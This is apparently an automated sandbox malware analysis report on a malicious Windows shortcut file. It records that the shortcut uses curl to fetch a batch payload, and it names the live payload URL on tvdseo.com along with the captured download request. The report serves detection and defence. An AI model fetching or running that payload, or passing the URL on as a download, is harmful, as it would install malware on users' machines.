Windows Analysis Report
document.lnk.download.lnk

Overview

General Information

Sample name: document.lnk.download.lnk
Analysis ID: 1562561
MD5: 504d8898a97dda2963425df8c5a04118
SHA1: 0554cf0e2137e4a925e9137b9330491361c77011
SHA256: 7a1d5aa394c347ff8606fa04a44cc507fab103c8167e52310ec683dbb005b4fd
Tags: Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Curl Download And Execute Combination
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batS Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-app-store-ios/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/about/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/comments/feed/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-app-chplay/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/phan-mem/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/url-short-short-link/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batD Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/app/ShemaTuyenDung.php Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-tiktok/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-lazada/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/cart-2/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/remove-background-xoa-nen-anh-free/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#organization Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-youtube/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver= Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/tin-hoc-ab/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.bate Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9. Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-tmdt/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/xmlrpc.php Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4) Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/xmlrpc.php?rsd Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/iq-vo-cuc/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.bat Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min. Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4); Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-instagram/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#website Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-facebook/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/thongtinhay/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-fanpage/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/my-account-2/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-google-map/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-shoppe/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc. Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#/schema/logo/image/ Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0 Avira URL Cloud: Label: phishing
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 93.2% probability
Machine Learning detection for sample
Source: document.lnk.download.lnk Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.7:49703 version: TLS 1.2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /file/quan.bat HTTP/1.1Host: tvdseo.comUser-Agent: curl/7.83.1Accept: */*
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: SEO TVD"},"image":{"@id":"https://tvdseo.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/102126481779000"]}]}</script> equals www.facebook.com (Facebook)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: <li class="bullet-arrow"><a href="https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg"><span style="font-size: 15px;">Youtube D equals www.youtube.com (Youtube)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: <li class="bullet-arrow"><a href="https://www.youtube.com/channel/UCjt7SG-LPi6OafmLxoc1ULg"><span style="font-size: 15px;">Youtube Tr equals www.youtube.com (Youtube)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: <p><iframe src="https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Ftvdseo&tabs=timeline&width=500&height=500&small_header=false&adapt_container_width=false&hide_cover=false&show_facepile=true&appId=270453733610848" width="500" height="500" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share"></iframe></p> equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: tvdseo.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:01:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.2.15expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://tvdseo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-Encodingplatform: hostingerpanel: hpanelcontent-security-policy: upgrade-insecure-requestsx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvEicoSiJDmB7Y12x6ziuTJeaIUpVBDygvw6DEwaKrs7dK7%2B7cZzJIvvg7Fp1CiMmSsBnAC0n%2Bf1Vxjc3rEWpZ9cWbvlmqOvuCln4fcZY197F64mB5CRw8OHYw%2Bz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e83335fdaa0422b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=725&delivery_rate=1332116&cwnd=234&unsent_bytes=0&cid=f60b1835723be41a&ts=887&x=0"
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: http://www.dmca.com/Protection/Status.aspx?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://api.w.org/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://congdonginan.vn/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://gmpg.org/xfn/11
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://gravatar.com/dungk396
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://images.dmca.com/Badges/DMCABadgeHelper.min.js
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://images.dmca.com/Badges/dmca_protected_sml_120l.png?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://images.dmca.com/badges/dmca.css?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://marketing.tvdseo.com/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://news.google.com/publications/CAAqBwgKMP6toQswlri5Aw?hl=vi&amp;gl=VN&amp;ceid=VN%3Avi
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://schema.org
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/#/schema/logo/image/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/#organization
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/#website
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/?s=
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/about/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/app/ShemaTuyenDung.php
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/cart-2/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/dich-vu/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/hocseo/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/phan-mem/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/thongtinhay/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/tin-hoc-ab/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/category/wiki/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/comments/feed/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-app-chplay/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-app-store-ios/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-facebook/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-fanpage/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-google-map/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-instagram/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-lazada/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-shoppe/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-tiki/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-tmdt/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-tiktok/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-website/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/dich-vu-seo-youtube/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/feed/
Source: curl.exe, 00000002.00000002.1293018592.00000000034E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmp, document.lnk.download.lnk String found in binary or memory: https://tvdseo.com/file/quan.bat
Source: curl.exe, 00000002.00000002.1293163205.0000000003655000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tvdseo.com/file/quan.batD
Source: curl.exe, 00000002.00000002.1293075206.0000000003620000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tvdseo.com/file/quan.batS
Source: curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tvdseo.com/file/quan.bate
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/iq-vo-cuc/
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/my-account-2/
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/my-account-2/lost-password/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/remove-background-xoa-nen-anh-free/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/url-short-short-link/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Sup8.
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver=
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.4.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9.
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min.
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4);
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-600x251.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_VUONG-removebg.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG.png
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf
